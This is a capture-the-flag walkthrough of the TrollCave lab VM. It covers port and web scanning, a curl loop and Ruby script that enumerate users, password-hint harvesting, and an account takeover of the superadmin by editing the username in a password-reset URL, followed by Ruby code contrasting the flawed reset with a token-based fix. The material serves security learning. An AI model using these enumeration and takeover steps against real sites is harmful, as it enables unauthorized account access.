TrollCave Boot to Root VM Walkthrough PART ONE

Introduction

Today we’ll begin the process of compromising one of Vulnhub’s latest VMs, “TrollCave”. The author, David Yates, says that this VM is attempting to be as realistic as possible, i.e. it steers away from the contrived scenarios which pop up in some CTFs (port knocking, MP3 file waveform analysis etc.)

The author has also stressed that a kernel exploit isn’t required to root this box, so that’ll save some time when we come to privesc the box later.

This is the first VM which has tested me to the point where I’ve had to stop and take a break, so this write up only covers from enumeration through to getting admin in the webapp. Part 2 of the write up will detail how to shell the box and continue exploitation.

Let’s go and break stuff!

NMap

root@kali:~# nmap -sV -T5 -sC -p- 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-24 19:03 GMT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00068s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:ab:d7:2e:58:74:aa:86:28:dd:98:77:2f:53:d9:73 (RSA)
|   256 57:5e:f4:77:b3:94:91:7e:9c:55:26:30:43:64:b1:72 (ECDSA)
|_  256 17:4d:7b:04:44:53:d1:51:d2:93:e9:50:e0:b2:20:4c (EdDSA)
80/tcp open  http    nginx 1.10.3 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Trollcave
MAC Address: 08:00:27:D0:D7:C5 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.26 seconds

Nothing hugely exciting here: only two ports are open, an NGINX 1.10.3 webserver on 80 and OpenSSH 7.2p2 on 22 (the Ubuntu 16.04 builds), and robots.txt has a single disallow entry for /. Let’s go and poke the webserver (whilst running the usual tools against it.)

Nikto

root@kali:~# nikto -host http://192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2018-03-24 19:07:59 (GMT0)
---------------------------------------------------------------------------
+ Server: nginx/1.10.3 (Ubuntu)
+ Cookie _thirtytwo_session created without the httponly flag
+ Uncommon header 'x-request-id' found, with contents: a9517fcb-1624-434f-983b-5099d46446e4
+ Uncommon header 'x-runtime' found, with contents: 0.029192
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3093: /login.php3?reason=chpass2%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ /login.asp: Admin login page/section found.
+ /login.html: Admin login page/section found.
+ /login.php: Admin login page/section found.
+ 7537 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2018-03-24 19:09:36 (GMT0) (97 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

A few interesting things pop out here. /login/ is obviously of interest to us. The login.php, login.php3 and login.asp hits look odd at first, but they are almost certainly all the same /login route: the _thirtytwo_session cookie and the x-request-id / x-runtime headers are the fingerprint of a Ruby on Rails app, and Rails treats a trailing extension (.php, .asp) as the requested response format rather than as a separate file, so the same controller answers for all of them. Nikto also flags that the session cookie is set without the HttpOnly flag, which is worth remembering if we find any XSS later.

Dirb

root@kali:~# dirb http://192.168.56.101/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Mar 24 19:08:01 2018
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.101/ ----
+ http://192.168.56.101/404 (CODE:200|SIZE:1564)                                                                                                                                                                  
+ http://192.168.56.101/500 (CODE:200|SIZE:1477)                                                                                                                                                                  
+ http://192.168.56.101/admin (CODE:302|SIZE:93)                                                                                                                                                                  
+ http://192.168.56.101/admin.cgi (CODE:302|SIZE:93)                                                                                                                                                              
+ http://192.168.56.101/admin.php (CODE:302|SIZE:93)                                                                                                                                                              
+ http://192.168.56.101/admin.pl (CODE:302|SIZE:93)                                                                                                                                                               
+ http://192.168.56.101/comments (CODE:302|SIZE:93)                                                                                                                                                               
+ http://192.168.56.101/favicon.ico (CODE:200|SIZE:0)                                                                                                                                                             
+ http://192.168.56.101/inbox (CODE:302|SIZE:93)                                                                                                                                                                  
+ http://192.168.56.101/login (CODE:200|SIZE:2208)                                                                                                                                                                
+ http://192.168.56.101/register (CODE:302|SIZE:88)                                                                                                                                                               
+ http://192.168.56.101/reports (CODE:302|SIZE:93)                                                                                                                                                                
+ http://192.168.56.101/robots.txt (CODE:200|SIZE:202)                                                                                                                                                            
+ http://192.168.56.101/users (CODE:302|SIZE:93)                                                                                                                                                                  
                                                                                                                                                                                                                  
-----------------
END_TIME: Sat Mar 24 19:08:35 2018
DOWNLOADED: 4612 - FOUND: 14

Dirb found all the treats! There’s that weird pattern again: admin.cgi, admin.php and admin.pl all return an identical 302 of 93 bytes, which is exactly what you’d expect if the extension is being ignored and every one of them is the same /admin route redirecting to the login page. No admin.asp this time, simply because that name isn’t in dirb’s common.txt wordlist. Let’s fire up the app in our browser and go to town on it.

Manual enumeration

So at first glance it’s a nicely designed, well locked down blog.

All of the interesting findings from above (/admin, /comments, /inbox, /reports, /users) are locked down with access control saying that you must be logged in. No obvious LFI vectors in the URLs, but individual user profile pages are public and use sequential numeric IDs, so we have an enumeration problem we can use to list every user in the app.

When navigating to a user’s profile page the URL changes from /users/1 to /users/2 etc., so we can write a little script to enumerate all users –

root@kali:~# for f in $(seq 1 20); do curl --silent "http://192.168.56.101/users/$f" | grep -i recipient_name | cut -d= -f3 | cut -d\" -f1; done
King
dave
dragon
coderguy
cooldude89
Sir
Q
teflon
TheDankMan
artemus
MrPotatoHead
Ian
kev
notanother
anybodyhome
onlyme
xer

Yeah the script’s a little ugly but hey, I’m a programmer and sometimes it’s fun to be a bit sloppy! 😉

So we’ve got a list of all users now (17 accounts in the first 20 IDs). We also notice that when we try to log in as a user, the app helpfully displays that account’s password hint. Let’s use this lovely data to get all of the password hints using Burpsuite –

I used the awesome Intruder module in Burpsuite to submit the login form once for every username in the list, then used the results processing options (a grep-extract on the hint element) to pull out just the hints from the responses:
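The enumeration loop above, written out as an added example rather than the post’s own one-liner. It keys on the same thing the cut pipeline does (a link whose query string carries recipient_name=<user>), but decodes the value, treats a 302 as a gated page rather than a missing user, and keeps walking past gaps in the ID sequence instead of stopping at a hard-coded 20. The /inbox/new path in the sample pages and the 5-miss cut-off are my assumptions; the HTTP fetch assumes the VM is reachable at the IP from the scans, and the offline run uses constructed pages only.

```ruby
# Added example (not the original post's code): enumerate TrollCave users via
# the sequential /users/<id> profile pages. Only the parsing/walk helpers are
# exercised offline; fetch_profile assumes the VM is up at BASE_URL.
require 'net/http'
require 'uri'

BASE_URL = 'http://192.168.56.101' # from the post's nmap/dirb output

# Pull the username out of a profile page. The post's `cut -d= -f3 | cut -d\" -f1`
# implies a link like ...?recipient_name=<user>"...; the rest of the markup in
# SAMPLE_PAGES below is constructed for this example.
def extract_username(html)
  m = html.match(/recipient_name=([^"'&]+)/)
  m && URI.decode_www_form_component(m[1])
end

# One profile fetch. Returns [status, username_or_nil]. Redirects are NOT
# followed on purpose: dirb showed 302 -> login for gated pages, so a 302 here
# means "protected", not "no such user".
def fetch_profile(id, base = BASE_URL)
  res = Net::HTTP.get_response(URI("#{base}/users/#{id}"))
  [res.code.to_i, res.code == '200' ? extract_username(res.body) : nil]
end

# Walk IDs upward until `max_misses` consecutive IDs yield no username, so a
# deleted account in the middle of the sequence doesn't end the run early.
# `fetcher` is injectable so the walk can be tested without the VM.
def enumerate_users(max_misses: 5, start: 1, fetcher: method(:fetch_profile))
  found  = {}
  misses = 0
  id     = start
  while misses < max_misses
    _status, name = fetcher.call(id)
    if name
      found[id] = name
      misses = 0
    else
      misses += 1
    end
    id += 1
  end
  found
end

# Constructed sample pages for an offline run (IDs 3 and 5 deliberately absent).
SAMPLE_PAGES = {
  1 => '<h1>King</h1><a href="/inbox/new?recipient_name=King">Message</a>',
  2 => '<a class="btn" href="/inbox/new?recipient_name=dave">Message</a>',
  4 => "<a href='/inbox/new?recipient_name=Sir%20Bob'>Message</a>",
}.freeze

def sample_fetcher(id)
  page = SAMPLE_PAGES[id]
  page ? [200, extract_username(page)] : [404, nil]
end

if __FILE__ == $PROGRAM_NAME
  # Offline demo; swap in the default fetcher to run it against the VM.
  enumerate_users(fetcher: method(:sample_fetcher)).each do |id, name|
    puts "#{id}\t#{name}"
  end
end
```

Against the live box, `enumerate_users` with the default fetcher walks /users/1 onward and returns an id-to-name hash you can feed straight into Intruder as the username payload list.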

King 🙂
dave nah lol
dragon Over fire and over stone…
coderguy 🙂
cooldude89 i am the dankest
Sir It’s super secure
Q Your normal password
teflon swordfish
TheDankMan 420
artemus garden
MrPotatoHead you know…
Ian a
kev mother’s maiden name
notanother (:
anybodyhome no one is
onlyme It is what it is
xer fave pronoun

And we’re done! So now we can start trying to guess some passwords using these cryptic hints (swordfish, garden, 420 and friends look like gifts)..

And get nowhere. Blargh.

Password Reset Pwnage

So after looking over all of the blog posts a bit closer, I spot one which mentions a half-implemented password reset function written in Ruby! So after Googling how to do password resets in Ruby on Rails I came across this absolute belter, which led me to trying various password_reset URLs until I came across this gem (see what I did there..!)

Uh oh… That doesn’t look good does it! 😉

Let’s reset King, the SuperAdmin’s password.

Bah! It’ll still let us progress further anyway, let’s pick a member and reset their password.

Ugh! More roadblocks! Although look at that URL.. the reset form we land on carries the username ‘xer’ in it. What would happen if we swapped ‘xer’ for ‘King’..?

So far so good, it’s given us a proper password reset form for King, even though King is the account the app refused to start a reset for. The server is trusting the username in the URL to decide whose password gets set. Let’s add a password and see if it works.

BINGO! We’re King the Superadmin! How awesome is that?
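The flaw in miniature, as an added example and not TrollCave’s actual reset code: a reset handler that looks the account up by a username carried in the request (what swapping ‘xer’ for ‘King’ abuses) next to the shape a Rails-style reset should have, where the only thing the request may carry is a random, single-use, expiring token that the server itself bound to a user ID when it issued the link. A Hash stands in for the users table, and the parameter names (user, token, password) are my assumptions.

```ruby
# Added example (not the VM's code): vulnerable vs. fixed password reset in
# plain Ruby. Users are a constructed Hash keyed by id.
require 'securerandom'
require 'digest'

# Constructed user store: id => {name:, role:, password:}
def seed_users
  {
    1  => { name: 'King', role: 'superadmin', password: 'unknown' },
    17 => { name: 'xer',  role: 'member',     password: 'unknown' },
  }
end

# --- Vulnerable: whoever controls the URL controls whose password is set. ---
# The name arrives in the request and is used directly for the lookup, so
# any attacker who can reach the form can reset any account they can name.
def reset_vulnerable!(users, params)
  user = users.values.find { |u| u[:name] == params[:user] }
  return :no_such_user unless user
  user[:password] = params[:password]
  :reset
end

# --- Fixed: the lookup is by token only; the request never names the user. ---
class ResetTokens
  TTL = 30 * 60 # seconds a reset link stays valid (assumed policy)

  def initialize(clock: -> { Time.now.to_i })
    @clock  = clock
    @issued = {} # sha256(token) => {user_id:, expires:}
  end

  # Mint a token bound to user_id and return the raw value for the e-mailed
  # link. Only its hash is stored, so a dumped table cannot be replayed.
  def issue(user_id)
    token = SecureRandom.urlsafe_base64(32)
    @issued[Digest::SHA256.hexdigest(token)] =
      { user_id: user_id, expires: @clock.call + TTL }
    token
  end

  # Consume a token. Returns the bound user_id, or nil if the token is
  # unknown, already used, or expired. Deleting on read makes it single-use.
  def redeem(token)
    return nil if token.nil?
    rec = @issued.delete(Digest::SHA256.hexdigest(token))
    return nil if rec.nil? || rec[:expires] < @clock.call
    rec[:user_id]
  end
end

def reset_safe!(users, tokens, params)
  # params[:user], if an attacker adds one, is deliberately never read.
  user_id = tokens.redeem(params[:token])
  return :invalid_token unless user_id && users[user_id]
  users[user_id][:password] = params[:password]
  :reset
end

if __FILE__ == $PROGRAM_NAME
  users = seed_users
  puts reset_vulnerable!(users, { user: 'King', password: 'pwned' }) # => reset
  tokens = ResetTokens.new
  link_token = tokens.issue(17)                                       # xer's link
  puts reset_safe!(users, tokens, { token: link_token, user: 'King', password: 'x' })
  puts users[1][:password]                                            # still 'pwned', not 'x'
end
```

The point of the fixed half is that nothing the client sends selects the account: the binding from token to user is made server-side at issue time, checked once, and then destroyed, so the ‘swap the username in the URL’ trick has nothing to swap.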

Conclusion

I’ve decided to park this VM for now, until my skills improve a little more and I’m able to fully compromise this box. Part 2 will be written and posted within the next few months, all being well.

Huge thanks to this box’s creator (link in Introduction) this is a really unique challenge which I’ve thoroughly enjoyed so far.
